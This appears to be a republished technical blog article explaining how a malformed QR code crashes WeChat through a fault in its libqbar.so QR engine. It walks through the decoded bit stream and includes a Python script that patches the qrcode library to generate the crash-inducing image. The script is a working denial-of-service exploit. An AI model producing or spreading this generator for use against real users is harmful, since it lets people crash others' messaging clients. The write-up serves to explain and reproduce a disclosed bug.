Why a Single QR Code Crashes WeChat: Inside the Memory Leak Bug
An unusual QR code triggers a memory‑leak in WeChat’s OCR engine, causing the app to crash on both mobile and desktop; the article explains the underlying null‑pointer exception, shows how the malformed “abnormal QR code” corrupts libqbar.so, and provides Python code to reproduce the bug using OpenCV’s open‑source QR engine.
WeChat QR code crash bug
Recently a QR code circulating online causes WeChat to crash within seconds after scanning or even just clicking the code. The crash shows a “WeChat runtime exception, please update to the latest version” prompt.
Testing on iOS shows the crash, while Windows 10 does not.
The issue is attributed to the QR code engine’s OCR component, which suffers a memory leak leading to a null‑pointer exception and crashes the entire client.
How the QR code engine works
It automatically recognizes QR codes in the chat list.
When the engine encounters the malformed QR code, a null‑pointer exception occurs, causing the QR module to crash.
The crash propagates to the whole WeChat client.
The same engine is used in other Tencent apps, so they may be affected as well.
Technical analysis
The problematic QR code is a “malformed QR code” that contains erroneous data blocks, causing libqbar.so to crash.
Decoding the QR code reveals that the data area is fully filled (224 bits) and the padding pattern is missing, leading to out‑of‑bounds reads and incorrect mode switches.
Final data bits :
00101111111110000101110100010001010001110011000010100000111011000001000111101100000100011110110000010001111011000001000111101100
[0010] [111111111] [0000101110100010001010001110011000010100000111011000001000111101100000100011110110000010001111011000001000111101100]
Mode Indicator : Alphanumeric Mode (0010)
Character Count Indicator : 511
Decoded data : 2333AA76%J5L1QVFA.380Cundefinedundefinedundefinedundefined……
Final Decoded string : 2333AA76%J5L1QVFA.380CReproduction script
import qrcode
from qrcode.util import QRData, MODE_8BIT_BYTE
NUM_BLOCKS = [19, 34, 55, 80, 108, 136, 156, 194, 232]
def tencent_crash_qrcode(message: str, filename='crash.png'):
def hack_put(self, num, length):
if num == 0:
num = 1
for i in range(length):
self.put_bit(((num >> (length - i - 1)) & 1) == 1)
data = message.encode('utf-8')
data_len = len(data)
version = 1
while version <= len(NUM_BLOCKS) and data_len + 3 > NUM_BLOCKS[version-1]:
version += 1
if version > len(NUM_BLOCKS):
raise Exception('message too long')
data += b' ' * (NUM_BLOCKS[version-1] - data_len - 3)
qr = qrcode.QRCode(version, qrcode.constants.ERROR_CORRECT_L)
comm_data = QRData(data, MODE_8BIT_BYTE)
hack_data = QRData(b'', MODE_8BIT_BYTE)
qr.add_data(comm_data, 0)
qr.add_data(hack_data, 0)
original_put = qrcode.util.BitBuffer.put
qrcode.util.BitBuffer.put = hack_put
qr.make_image().save(filename)
qrcode.util.BitBuffer.put = original_put
# Example usage
# tencent_crash_qrcode('KFCVW50')Running the script generates a QR code that crashes WeChat on iOS and macOS.
Related incidents
On March 29, Tencent’s WeChat and QQ services experienced a major outage affecting voice calls, Moments, payments, and file transfers. The company classified it as a level‑one incident, and regulators demanded improved safety‑production management.
Images above illustrate the crash behavior and the malformed QR code.
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
Programmer DD
A tinkering programmer and author of "Spring Cloud Microservices in Action"
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.